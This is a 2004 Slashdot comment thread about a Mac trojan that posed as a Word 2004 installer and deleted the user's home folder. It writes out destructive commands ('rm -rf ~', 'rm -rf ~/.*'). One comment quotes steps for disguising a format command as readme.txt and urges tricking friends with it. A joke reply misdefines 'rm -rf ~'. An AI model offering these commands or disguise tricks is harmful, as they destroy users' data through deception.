"It's the height of ridiculousness to say for those 9 lines you get hundreds of millions."
The person creating a virus/whateveryouwannacallit, could just create a disk image(dmg), and have the icon be a legit MS icon, and do the same thing. That's what you get for downloading and running things that you can't trust.
1.Box up Macintosh
2. Return To Vendor
3. Apologise profusely and tell them what you wanted was a eMachine!
4. Do not complain when you are handed a box that says Atari 2600. This is more than enough computing for you.
5. Enjoy Pitfall!!!!
Yeah, I guess I'm funny like that.
I worked on Macs as an certified tech back when the IIfx was the machine. I used to run Disinfectant on every machine I worked on, and there were tons of them that were infected, and this was on machines that didn't even have modems and weren't on networks. The only reason I bring this up is that this is probably a /. story soley because it involves a trojan or virus on a Mac. The fact that some poor schmuck actually downloaded what he thought was a commercial app from p2p network and tried to install it... this is "Stuff that matters"?
666-607: 6th floor apartment of the beast
Even the trojans 'just work'!
Practice Kind Randomness and Beautiful Acts of Nonsense.
I took the MacCentral website (which is now run by Macworld) to task for this, and I'll take Slashdot to task for the same thing. In some of the more reputable Mac-related news sites, this story was more accurately covered; the Trojan in question was downloaded from the Gnutella network. Limewire is not a network, it's a Gnutella client -- yet sites like MacCentral reported that the file was downloaded from the LimeWire network. Now on Slashdot, we're seeing much the same thing -- as if to imply that this Trojan is somehow only available with Limewire.
Since there are at least 3 other Gnutella clients available for Mac OS X (Phex, Acquisition, and XFactor are the ones I know of), there are many more potential vectors for this Trojan to find its way onto a Mac user's computer.
Yeah, I know, it's asinine to trade warez on any P2P network...
There's nothing to stop this Trojan from making it to other file sharing networks, except perhaps a dose of common sense, so this isn't even a Gnutella-specific problem. I'm just a little peeved with sloppy news reporting.
Two things seem worth pointing out:
1. No platform is immune from trojans, since they require the user to actually download and run (by definition, otherwise they'd be worms, right?).
2. When this happens on a Windows machine, your whole system is foobar. When it happens on a Mac, you lose your home folder and personal settings. That's a big difference!
Strange that Microsoft has popped up in this one, huh? Hmm... if I were a conspiracy theorist....
The real issues is whether it can it replicate itself and whether it can use security holes in OS X to distribute itself to others. I've been round and round with people on this topic and the conclusion is that, at every point, OS X presents too great a hurdle to allow it to occur. You either have to rely on lots of Apple programs working together to do it (which is too unwieldy and too visible to the user) or you have to rely on the more stealthy Unix stuff, much of which is turned off by default (i.e., no using mail quietly in the background to distribute the trojan/virus because sendmail is off by default.)
It seems to me that Intego is looking to scare people into buying their products and in doing so, they have blown any credibility they have.
--Rick "If it isn't broken, take it apart and find out why."
The files are not gone. MSWord 2004 is just converting them all to its native format. Even on a G5 however this will take another 6 days, so simply remain calm and trust to Microsoft.
"It's the height of ridiculousness to say for those 9 lines you get hundreds of millions."
this way will be the primary way people will get rooted. Stupidity.
Idiot downloads software that is TGTBT (too good to be true) and it fux0rs the machine. Suprise! Shock! Horror!
Yes, Mac machines are vulnerable just like any other software. no big deal. I'm suprised someone bothered to take the time to make a trojan for Mac.
-- Having a Creationist Museum is like having an Atheist place of worship
...is the old verity about how difficult it is to scam an honest man. The ones who are looking for something more than they deserve are easy pickings.
Just to clear things up for you:
This is pretty clearly a Trojan horse: it advertised itself to the lUser as a copy of Microsoft Word in order to gain access to his system. The payload of the unwanted software (be it virus, worm, Trojan, or something else) is irrelevant to its classification.
All's true that is mistrusted
It's a delightful change of pace from reading about stupid Windows using pirates to read about stupid Mac using pirates. I mean, there used to be this myth that Mac users were somehow better and more enlightened than the rest of us.
I wonder if he did his /. post from another, unaffected, Mac, or had to lower himself to a WinTel machine to get the MSWord out.
"It's the height of ridiculousness to say for those 9 lines you get hundreds of millions."
A much better idea is to run a virtual machine and 'test' what you have in that. NEVER EVER risk your production machine/network.
This holds true for purchased commercial ( or legit free ) software and patches.. Always test first..
( that aside, the guy was an idiot )
---- Booth was a patriot ----
This trojan runs everyone's favorite command:
rm -rf ~
I'd advise protecting yourself and alias rm to 'rm -i'. Either that or choose to not run applications with fruity MS icons that you download from p2p =)
"My mother never saw the irony in calling me a son-of-a-bitch." - Jack Nicholson
They claim there is a file out there that when you download it it deletes your home directory. I will say YES, there is...
ONLY IF YOU ARE A FRICKIN IDIOT!!!!
The "File" is nothing but a script that executes an "rm -rf ~" command. I can write a "Trojan Horse" with the same command in shell script, MS .bat, and numerous other scripting languages and in some cases compile it into an application as to remain unseen till it's too late. Please people stop making this shit up. If anyone seriously thinks the pirated application they are trying to get only takes 1-2 hundred K then THEY DESERVE TO GET THEIR INFO WIPED OUT!!!!
MacOSX, because making *NIX better is a lot better than waiting for Micro$loth to fix Windows
That it was really a trojan and Word wasn't intended to hose your system?!?!?
While I agree this guy probably had what was coming to him, if you had a child that was poisoned by someone you never met, would you say "This is 2004, he/she should know by now not to take candy from strangers?"
ok, we've established that he's retarded because he goes to Limewire to download "legit" software, then makes the news.
compound this with his security screening process involving nothing more than looking at a trustworthy icon.
already the guy deserves everything he gets.
But in defense of this badly placed story, ie; the Apple section, had he been using a non-UNIX OS, then his uid probably would have had access to everything.
However, this 'tard will have just entered the root password when asked by this app anyway because it had a legit icon. He got off lightly to only lose his home directory. Maybe the author of the trojan is related to him.
This is the sort of thing that gives Mac users a bad name. Not because "macs are finally getting viruses/trojans," but because of the limited mental capacity of both the malware authors and the people who run the malware.
The reason girls and Windows users don't understand UNIX is because all the documentation is in Man files.
Every damn OS has had these things. From DOS to unix to C64 to VMS. Usually people are smarter but these days you got a lot of idiots.
You see stuff on usenet. The Sims 2. 31kb file Full game really works as the description.
User stupidity is not unique to any OS but at least when you use Linux the designers don't help you being stupid.
MMO Quests are like orgasms:
You may solo them, I prefer them in a group.
There is no patch for human stupidity.
Hey, this is Insightful!
"It's the height of ridiculousness to say for those 9 lines you get hundreds of millions."
If all those adult video companies seed betas of their movies on LimeWire, why is it unreasonable to believe that Microsoft wouldn't do the same with software ?
Just make sure you help them out by providing feedback...
From what I understand, it was exactly what you suspected!
There's an interesting discussion going on at Mac OS X Hints regarding this.
Mods! Undo the aggregious error of that 'Troll' mod!
fs
-truth
I had a steady B+ in my AI class until I failed the Turing test...
"This is 2004, you should know by now not to open a file from an untrusted source."
that SHOULD read...
"This is 2004. All slashdot readers know not to open files from an untrusted source, but the rest of the world is still as dumb as ever."
An interesting discussion about this is also taking place here.
fs
It is all Microsoft's fault! IF they did not announce that they were releasing Office 2004, this would not have happened. It is part of the "software sales through obscurity" initiative.
I hate sigs.
This sounds similar to the recent trojan horse proof-of-concept.
No, that involved an application pretending to be a document. This is a case of an application pretending to be a different application. There is no security regarding the identity of applications, and an application can have any icon it chooses--the burden is on users to obtain their applications from trusted sources, not Limewire. Of course, if he really thought it was a "public beta," as he claims, he probably would have gone looking for it at the Microsoft web site.
Since the permissions on a Unix-stle system are to allow the user to control over what they 'own ' (mainly the home directory) there's little to prevent a program run by the user from doing whatever it wants with user data. This applies to Linux, *BSD, and the commercial *nixes as well, not just OSX.
In the short term there are technical 'fixes' that can help but they are not perfect. Libtrash under Linux or using a backup tool that does *not* have the same rights as the user are good CYA in the short run, though an isolated sandbox or similar tools should really be available. How to pull this off, I don't know...if you've heard of end-user tools that can pass the pointy-haired-boss test, let me know!
A firewall can not protect you from yourself. Turn off what you do not need. Do not use the firewall to do your work.
I know some folks that download public betas of popular songs all the time. Perfectly understandable mistake. ;-)
This is my post. There are many others like it. If you don't like what you read here, go try one of the others.
Yeah, right! He deserved what he got!
This proves that Macs don't get attacked by trojans in email, etc, not because it's somehow more secure or "better" technology, but simply because There's no technical reason why Macs can't be attacked as much as Windows computers are.
Best Buy can have you arrested
This is where everything started to go wrong.
A piece of malware on a Mac? That's unpossible! /glad I run Windows...
It sounds like the real office to me.
what's the command line for doing what you suggest, alias rm to rm -i?
An example please. alias --help and man alias bring up nothing.
tia.
You gotta wonder when that version of Office 2004 you DLed is 10MB. Although these days even a beta of the splash screen would be something. :)
To summarize: trojans seem to be going strong on Mac OS X, presumably because viruses don't bite. And damage is limited to the files you can access anyway.
--Bud
I really want this feature. From what I've read, the latest kde has this. Does any other DE have this for linux?
There really should be a standard for this. A typical scenario the other day. I was downloading a bunch of crap and compiling something. My gf wanted to check her email, but I told her she has to wait.
Yes I know, I could install some ncurses based email(but I introduced her to evolution and she loves it) or be doing my compile, downloads in a seperate term, but there are many situations where that wouldn't apply.
WinXP has this and as I said I believe kde has it.
We really need a standard way of doing this (and without having 2 seperate X sessions going).
Any work being done on this?
The Mac doesn't (yet) have the plethora of mechanisms that viruses on Microsoft platforms use to automatically launch themselves, but the good old human engineering attack will work on anything. Back in 1980 at Berkeley people would stick prank files in their home directory with names like "advent450" to make people think they were enhanced versions of the old "Colossal Cave" adventure (which was undergoing frantic expansion at Berkeley at the time) and run them...
It's like the Warlock in Niven's "The Magic Goes Away": the thing about being a magician is everyone expects you to use magic, but a dagger always works. No operating system can keep someone from explicitly unpacking and executing a file.
So, no, the Mac is definitely not immune, but the rate of virus propogation on the Mac should be limited by the need for people to deliberately unpack and run the infected file. What makes virus propogation on Windows so rapid is the way they've integrated the browser and the desktop, which means that they have to block potential exploits one by one. Apple's web integration is not nearly so complete, though they're beginning to do things that I find dubious as they start getting feature-crazy with Safari...
Of course when I tell people they probably want to turn off "automatically open safe attachments" in their browser, just in case, they come back with this argument that the Mac is immune to viruses. Well, yes, it's at least resistant... but that's only because there aren't many things like "automatically open safe attachments" for viruses to take advantage of.
Yet.
The reader told Macworld: 'I downloaded the file in the hope that perhaps Microsoft had released some sort of public beta.
.. The idiot tried to get warez. If you try and download warez off a p2p network and get screwed in the process, you deserve it.
.. if it was a public beta, wouldnt it be on the MICROSOFT site?
Lies
C'mon
I'll quote wikipedia...
So, to reiterate: a virus requires another executable as a host, a worm does not. That is the difference between the two.
The concept of a "trojan horse" is somewhat orthogonal to that of "virus" or "worm", though I think it is a distinct enough phenomenon to warrant its own designation.
All's true that is mistrusted
Reading this mindless rant, one has to ask. . .menses?
Yeah. It's called unplug your Ethernet cable, turn off your wireless, or disconnecting your modem. =P
Seriously, though, can't you just set your firewall to not allow anything out at that specific time, and if it doesn't work, delete it? Also, one would probably also make sure that the process isn't running anymore...
In bash, "alias" is not a separate program; it's a reserved work within the shell. That's why you don't see a man page. If you do a "man bash", you will find information on the alias command.
Example of what to put in ~/.bashrc:
alias rm='rm -i'
This is hardly going to knock anyone off anything.
A Mac trojan that only affects the people stupid enough to run it is nothing compared to the laundry list of remote exploits that plague Windows users who don't use a firewall and/or run Windows Update every day.
Actually, it does. A public Beta will most likely be an execute and it downloads for you, so Microsoft can keep some control.
MSDN Acedemic alliance is like that
What's dumber than a Windows user? A Mac user, apparently.
Yeah, big difference.
Luckily, I only lost all my data!
Troll??!!! WTF?!!! I was speaking the truth. Honestly, how many Slashdot readers would be stupid enough to download something they thought was Word 2004 and then run it? From a P2P client? If people answer that they would, then Slashdot is no longer "News for Nerds". It's become "News for mouth breathing idiots without a pulse". Hmmm... maybe the fact that this story got poste is enough proof of that already. Damn! I just got a big dose of stupid from yet another clueless moderator.
Who is Twirlip of the Mists?
That if i refered to someone as being "404", even my geekier friends would slap me. Almost as bad as the time i heard someone using the future slang from tom clancy's net force books...
"Sic Semper Tyrannosaurus Rex."
I think it would be a good idea to have a feature in OS X that could launch a program as "untrusted". It should be able to restrict the programs access to the file system, the network stack, etc. Kind of like what .Net does, except not as extreme.
Avoid Missing Ball for High Score
As we've seen in recent weeks, quality porn is hardly virus free.
"Sic Semper Tyrannosaurus Rex."
Downloading a 60k program off Gnutella... to install a beta of Word 2004... ok then. There's just sooo many things wrong with this scenario its not even funny.
Who wants to bet this person was just experiencing an ID 10 T moment while trying to pirate Office 2k4?
2- A Mac zealot did it coz' he doesn't like Microsoft stuff running on Macs
3- Microsoft did it to teach pirates a lesson
4- A Linux zealot did it to discredit Microsoft
5- A BSD zealot did it to discredit Linux
6- SCO did it because they own the IP of all Unix-based systems, so there
7- Kevin Bacon did it
When people ask me why I use Linux, one of the things I always say is "I never have to pirate software anymore." Everyone ignores it, but this story demonstrates why I always mention it. When you don't have to pirate software, you don't have to worry that some program that you need but can't afford or don't want to pay for is going to destroy your system. All my stuff comes from a much more trusted source than Limewire.
Everyone I know who uses Windows and pirates software like this has to put up with this shit. It's just not worth it, especially when you just want to get your work done. Of course, in these days where you plug your machine in and you get a host of infections automatically within a 24 hour timespan perhaps no one really worries as much about these things anymore.
"I may not have morals, but I have standards."
This is 2004, you should know by now not to open a file from an untrusted source.
Except of course when it's a Windows computer, then it's Microsoft's fault.
"This is 2004, you should know by now not to open a file from an untrusted source."
or trust any news from slashdot...
Isn't this old news?? Back in the BBS days alot of files floated around that purported to be installers. But when run they would trash your system folder, drop alot of viruses, and then install joke extensions. I know many of the So Cal mac BBS's had to clean out alot of files due to installers like these. So 10-11 years ago we had the same problem.
---In a time of Chimpanzees I was a Monkey.
From the story:
I call bullshit! Yeah, right .. he thought it was a beta. If you guys buy that, I have some real nice property on the moon I'd like to sell you.
So anyway, this guy downloaded something, and *GASP* his ignorance of what software is out there made him get something he didn't want.
This might be kind of funny if its a friend of yours, but seriously folks, is this really front page material for slashdot? I love this site, I truly do, but please editors at least have some standards for what gets on the front page.
It puts the lotion on its skin or else it gets the hose again.
Its all about the icon baby, all about the icon. As long as that *looks* legit, you know the warez are genuine. bahahaha.
Perhaps some kind of mechanism is needed to force programs to run with as few privileges as possible.
At last, a use for fast user switching.
Q&A from Intego regarding Trojan Horse
Where did Intego first find out about this Trojan horse?
Intego, after writing and releasing the first mp3 trojan for the Mac OSX platform in order to improve our business, decided to write a dangerous Applescript, give it an installer icon and release it in order to further generate sales for our otherwise uselss AV products that no one wants. Even though this is not a real trojan and this approach involves social engineering that has been known about for years (We initially considered simply writing a readme file that instructed the user to type "rm -rf ~/" in the terminal, but thought that that would be too complex) we know thta our approach, known as the SCO school of IT business, is guaranteed to raise revenue.
Have you informed Apple, Microsoft and the CERT about this Trojan horse?
Yes, we informed Apple, Microsoft and the CERT as soon as had done our first working Applescript. They were very proud of us. Especially the people at Microsoft.
Has Microsoft made any comments about this Trojan horse?
Microsoft made the following comments: "Microsoft has verified that it does not write or encourage others to write trojans for the Macintosh platform. Microsoft, however, certainly is not above offering the occasional tip when it comes to torpedoing other company's platforms"
Listen to this guy, if anyone knows a troll, this guy must. He's the biggest one on slashdot.
rm -rf ~
If I put this is an apple script and gave it a nice icon would this make it a freaking trojan by anyones standards???
this is just people trying too hard to find a problem with macintosh. Move along nothing to see here.
On Windows it would very likely have wiped your hard drive because it would likely have root privledges. Now this of course could happen on a mac too since it's getting common for apps to ask for root when they install. But at least it would have to ask.
Some drink at the fountain of knowledge. Others just gargle.
It puts the lotion on its skin or else it gets the hose again.
It's a program with a word icon that does rm -rf ~. The article doesn't even say how big the file is, but i'm willing to bet it was only a couple kb.
'I clicked on the installer file, and to my horror in 10 seconds the attachment had wiped my entire Home folder!'
Whaaaat? TEN FRICKIN' SECONDS!!! Dude, you need to upgrade. My G5 smoked my home directory in TWO.
I'm not normally an irrational zealous dickhead, but I figure "When in Rome..."
My, my, my. I'm honoured. I'm THE biggest troll on Slashdot, am I? Even though I've only been around a month? I'll bet you haven't a clue who I REALLY am. The truth would shock you.
Who is Twirlip of the Mists?
Mac user pirates a 10kB OSX version of Word and gets all his stuff deleted.
Don't you think Slashdot is the last place where people need to be made aware of something like this?
Turning your boneheaded mistake into a security advisory isn't going to win you much respect here.
Turns out Slashdot was wrong--XP SP2 will not install on pirated copies of Windows.
So much for all that "dominance through piracy" conspiracy crap. This is completely off-topic.
Surely the simplest check of whether it was a genuine Microsoft release was to check the file size...
If it is several meg or larger in size, the chances of it being a piece of MS bloatware is high. If it's small it probably isn't.
Sara
Designer, Gamer, Macgrrl in an XP World
Thankfully, the author of this trojan was short sighted enough to make it delete the users home directory instantly, and probably all of the files they were sharing via p2p. The trojan will wipe itself out fairly quickly as people download the file, click on it, and erase everything in their home directory thus removing the trojan itself and disabling its most likely method of distribution (by deleting the p2p programs preferences).
It would have worked better if the program had just installed an invisible helper (or cron job) to delete the users home dir at a later date and then deliberately bombed out. It'd also be much harder to track it down to that broken Word demo that you downloaded the other day.
Come on now. You are just trying to frighten people. Everyone knows that "rm -rf ~" stands for "read mail, really fast, everything in my home directory".
Sigh... I *wish* I had a coop to torture.. um... I mean, mentor.
A Mac user opens an unknown file from an untrusted source, it turns out to be destructive, and it blows away his data.
Conclusion - said Mac user is at fault.
Windows user open an unknown file from an untrusted source, it turns out to be destructive, and it blows away his data.
Conclusion - Microsoft is at fault.
Of course! How could I not see the difference?
Well, dude, if you are going to download bent or pirated software you have got to be prepared for the consequences. Who do you have to blame other than yourself ? Dipshit ! I can hardly believe your post got accepted on slashdot!
Electronic Music Made Using Linux http://soundcloud.com/polyp
Fire was found to scald people when they stick their hands in it, also water is wet.
More informational news to follow @11PM for people who still download and open files without scanning them...
The reason why there are no viruses on macs?
Why spend days writing a complex virus when users will fall for clicking on a script which took 5 seconds to write and 10 seconds to download a "genuine" icon for.
Is there a rule on slashdot that it's bad to say I Told You So?
before anyone comments on this line
"Im just saddenned by the fact that OSX is vulnerable to the inadequacies of OSX." I meant
"Im just saddenned by the fact that OSX is vulnerable to the inadequacies of Microsoft."
I am pissed outta my skull..
Honestly, why did this even get a link?
User downloads executable from peer to peer network, runs said executable, and loses data.
If it wasn't labeled MS-Word would we have even seen this? I find it highly doubtful.
You would think by now, with all the scumware out there, people would realize that software should be downloaded at the source, or from a reputable middleman, not from anonymous sources who may have altered the payload in some way.
It doesn't matter if it's on a Mac, Windows, or Linux machine. Running "mystery code" is just plain stupid.
Look, it was dumb for the person to open a file from an untrusted source.
However, why are OS's designed to let such a small mistake have such a dire consequence? It's like a car having a big red self-destruct button next to the radio dial.
Maybe it's time that OS makers (Mac, MS, and Linux et. al.) realize that computers aren't just used by sys admins, but real people, which includes kids, morons, and the gulliable.
Is that *you* Al Franken? Is it really?
Either that or you were dumb enough to run the installer as root.
No, he wasn't. The command issued by the trojan was crafted to attempt to delete the current user's home folder. If that user's account was admin-level, the command would succeed. If it wasn't, the command would fail due to insufficient permissions. If he had been logged in as root, it would have merely deleted the home directory for 'root.'
This is not an inadequacy of OS X, the system is doing what it's being commanded to do, by the currently-logged-in, authorized, local user-- no more, no less. If the currently-logged-in, authorized, local user is a twit who runs apps he downloads from p2p networks without due care, them's the breaks.
What the fudge is he doing downloading it over limewire?!
Dude deserves to have his home folder wiped
On the note about the whole making the Icon look like the real thing... uhm guys, can't you do this just as easy as in Windows?
l
/autotest
/y c:\*.*) your entire C drive!
/autotest and click on Ok
Here is a link to get you guys started on tricking your friends into formatting their hard drives:
http://lockdowncorp.com/hackertricks.htm
From that page:
"Dangerous Commands That Can Be Embedded
PIF Shortcut Extensions
Some hidden file extensions can easily be programmed with hidden commands that could do damage to your system. Following is a simple test:
1.
Right click your mouse on your desktop and select New
and then ShortCut
2.
In the command line type: format a:
3.
Click Next
4.
In the "Select a name for the shortcut" area type: readme.txt
5.
Click Next
6.
Select a notepad icon and click Finish
You now have a file on your desktop called readme.txt with a notepad icon. Make sure there is a disk in your drive that you do not mind being wiped and click on the icon. The file that you click on will do a format on the disk in the A: drive. Of course, the hacker's icon would target another drive, or maybe have a name such as 'game.exe' and with a command to delete your Windows directory or (deltree
If the PIF extension were not hidden, this would not be able to fool you."
Or, you could also do the following:
"SHS Extensions
Scrap files can also hide embedded commands. Following is a simple test:
1.
Make a copy of notepad.exe and put it on your desktop.
2.
Open Wordpad
3.
Click and drag notepad.exe into the open wordpad document.
4.
Click on Edit and select Package Object, then select Edit Package
5.
Click on Edit and then Command Line
6.
Type a command in the box such as format a:
7.
The Icon can also be changed from this edit window
8.
Exit from the edit window and it will update the document
9.
Click and drag notepad back to the desktop
10.
Rename the file that it created (Scrap) to Readme.txt
You now have what will look like a text file. If it is run it will format the disk in the A: drive. As seen in the example above for PIF Shortcut Extensions, the hacker could use more dangerous commands."
Various other types of info available there. Enjoy.
Try not to let life get in the way of living.
I downloaded the file in the hope that perhaps Microsoft had released some sort of public beta. The file unzipped, and to my delight the Microsoft icon looked genuine and trustworthy.
When was the last time Microsoft released ANY program on a P2P network?
I guess I should say official release.
'I clicked on the installer file, and to my horror in 10 seconds the attachment had wiped my entire Home folder!'
...Ten seconds. Feel the raw power of *BSD!
Not sure what's wrong with your copy, but NeoOffice/J uses the native print capabilities of OS X: you get PDF printing for free, right there in the print dialog. Are you using an older version of OS X? I forget when they added PDF printing.
New versions of OpenOffice have an "Export to PDF" option that makes very clean PDFs. That was the feature I was referring to. Running the document through the print system is workable, but doesn't produce as nice of documents.
Javascript + Nintendo DSi = DSiCade
For real tho' that is the funniest thing I have heard all year, and I am Mac Tech Support. So the rest is offtopic.
/OPT and it is double-clickable. I could put my two year old on it. it's sawheet! .RTF file. It's, a Mac but virus checkers don't allow for stupidity.
Go to http://kde.opendarwin.org/ and run the installer and step well away, go do some yardwork, play with the wife, children...Tha pussy (or dog) do whatever. Then when you return, in the '/Applications' is a KDE folder the real deal is in
Even (sic) "free" MS software is wac mac crac[k] Office users only use it because they have to. Office on the mac only increases their market share. Has Anyone really been pissed to get an
--Shaddup and support your local PBS station Plan for it
"why..."
M$oftware is an order of magnitude more indecent than even the raunchiest of adult videos. But that's only my opinion as a part-time software tester and full-time prevert.
I would not be surprised if Intego planted this themselves to try to drum up business for the non existant Mac antivirus market.
I hate sigs.
Since people are reporting to Macrumors they are already recieving their copies of Office 2004, the guy's story he though he was downloading a "public beta" really don't hold up in my mind.
On a few samples I had, there was no difference between exported to PDF and printed to PDF. YMMV, I guess.
--AP
Any Mac user who is delighted that a Microsoft icon looks "trustworthy" doesn't deserve their machine. I think we should send out some iNinjas to kill them and bring their machines back to me so I can make them happy and give them to deserving users who won't be complete retards.
Cthulu saves... in case he gets hungry later.
::helping geeks get laid since 1983::
Most M$ based worms are only a few K it took a whole ISO image to bring the apple down? Thats really not too bad :)
A loop, by its nature, continues. If that didn't make sense, start reading this sentence again.
This is 2004, you should know by now not to open a file from an untrusted source.
So stand up everyone, sit down all those who have downloaded a binary only file from the internet that they didn't personally verify.
Now stand down all those who downloaded RPM's or binary equivilants.
Now stand down all those people who downloaded open source applications but didn't check that the configure and/or makefile script didn't do anything nasty.
Now stand down all those people who didn't go through the source code line by line to ensure that nothing nasty was in there.
Hmmm, no-one is standing. How unsurprising.
The fact is you deal with things that can you cannot truely trust on a day to day basis (hello Windows and even the Linux kernel). If you cann't personally verify every single line then it's untrusted.
Anyone who says "don't run something from an untrusted source" is preaching something which is realistically impractical to actually adhere to.
Avantslash - View Slashdot cleanly on your mobile phone.
"UNIX was designed to run on mainframes and serve dozens, hundreds or even thousands of users."
:)
Actually, UNIX was designed to run as a game platform on a PDP-7 minicomputer.
From Origins and History of Unix
"Unix began its life on a scavenged PDP-7 minicomputer[14] like the one shown in Figure 2.1, as a platform for the Space Travel game and a testbed for Thompson's ideas about operating system design."
"the Microsoft icon looked genuine and trustworthy"
Ha Ha Ha, serves him right!
What about the fact that it was probably only about a few kb in size rather than the several megabytes that it should have been. . .
It's 2004. Is there no way to run a program in a sandbox and give it limited privileges by default?
For example, you could run the app with read-only access to the filesystem, and no network access. To prevent noddy DoS attacks the process and its children could be limited to 100 megabytes of memory and ten fork() calls.
Better still, the app could have no access to any file apart from its own program code (ie, the files inside the application directory). If you want to view a file in the application, the file manager program passes it an open file descriptor to read from but only after you have explicitly selected the file in the file manager and asked to view it in the untrustworthy application.
This could also be done for IRC clients, web browsers and other programs where a serious enough bug could open up nasty ways for others to hijack your computer. There's no real reason to run these will full user privelege. They don't need the ability to delete arbitrary files from your home directory, so why do we grant it to them?
-- Ed Avis ed@membled.com
they only got morons to use mac on those ads, so now they get what they deserve
subject says it all.
No, I didn't do this too, if I did, I'd post as anonymous coward.
These are some of the things molecules do...... given 4 billion years -Carl Sagan
I call bullshit! The whole damn thing is unlikely. The quote (attributed to some mystery person?) sounds exactly like it was written by a copywriter.
m ?N ewsID=8664
Here's why:
1) How often have you said, or written, "and to my delight" normal correspondence? Or "and to my delight" for that matter... (Even if you are from the UK...)
2) How many Mac users would use "genuine", "trustworthy" and "Microsoft" in the same sentence?
3) A Mac user would most likely say "double-clicked" instead of "I clicked on the installer file".
4) This quote has no attributable source. Who said this?
Judge for yourself...
http://www.macworld.co.uk/news/top_news_item.cf
I have CF13 handle all my incoming email. I'm getting unwanted file attachments that are likely brand-spanking-new malware but haven't been detected yet by the antivirus programs as malware (just released into the wild). So these suspect file attachments sit as 'text files' on my hard disk drive waiting to be scanned and identified as malware--a likely possiblility.
I use Outpost Firewall to keep malware out at the Internet data transport level. Using both give me peace of mind after my run-in with Klez a year or so ago....
If you want to kill your hidden config-files, try this:
/Users/foo and /Users (assuming your home directory is the OS X default /Users/foo). The second will not show you what you expect either.
..myfile; if you have such files, which you probably shouldn't, a pattern like ~/.[^.]* ~/..?* will notice them too.
rm -rf ~/.*
You can view these files like this:
ls -al ~/.*
The first will give you some error messages when it attempts to delete ~/. and ~/.., which are
The correct shell-glob pattern is probably ~/.[^.]* ([^.] means any character that isn't a dot). That will miss files called silly things like
To list hidden files, just doing "ls -a ~" or "ls -A ~" is simpler (I don't know whether -A works in OS X's BSD ls, but in GNU ls it's an alias for --almost-all, which shows everything except "." and ".."). As usual, add -l if you want the long-format listing.
Lemme guess: the download actually contained the iTunes 2.0 installer or Safari build 48, right?
I recall all of those DOS based "2400 to 9600 baud converter" programs that people used to upload to BBSes. When run it created a virus or trojan on the system. This is nothing new.
File sharing networks are full of files like that which are too small to be the real deal, yet people are tricked into downloading them, thinking it is what they are looking for.
This is not a problem for me, until I start getting support calls, or emails from people who got infected. Please clean my system so I can get work done, they ask.
Worst case I had was almost 49 trojans/viruses on one system that had someone running a file sharing program, and their daughter downloaded all the crap she could find and ran it. So I deleted the file sharing program and all the infected files. I installed the latest free antivirus, antitrojan, anti-spyware, tools and cleaned the system. Somehow it is infected again because they complain that it is running too slow now.
On one of my test systems, I got into a file sharing network, and started to download random files I searched for. I had several malware detectors. Most of the files downloaded were malware and got deleted. I'd say a good 87% of them were infected. No files where run or kept, I was just testing the malware detectors. The hard drive was reformatted later on.
People get what they pay for, and if they try to cheat the system, they may get violated by malware.
Remember, Slashdot does not have a -1 disagree moderation, and no, troll, flamebait, and overrated are not substitutes.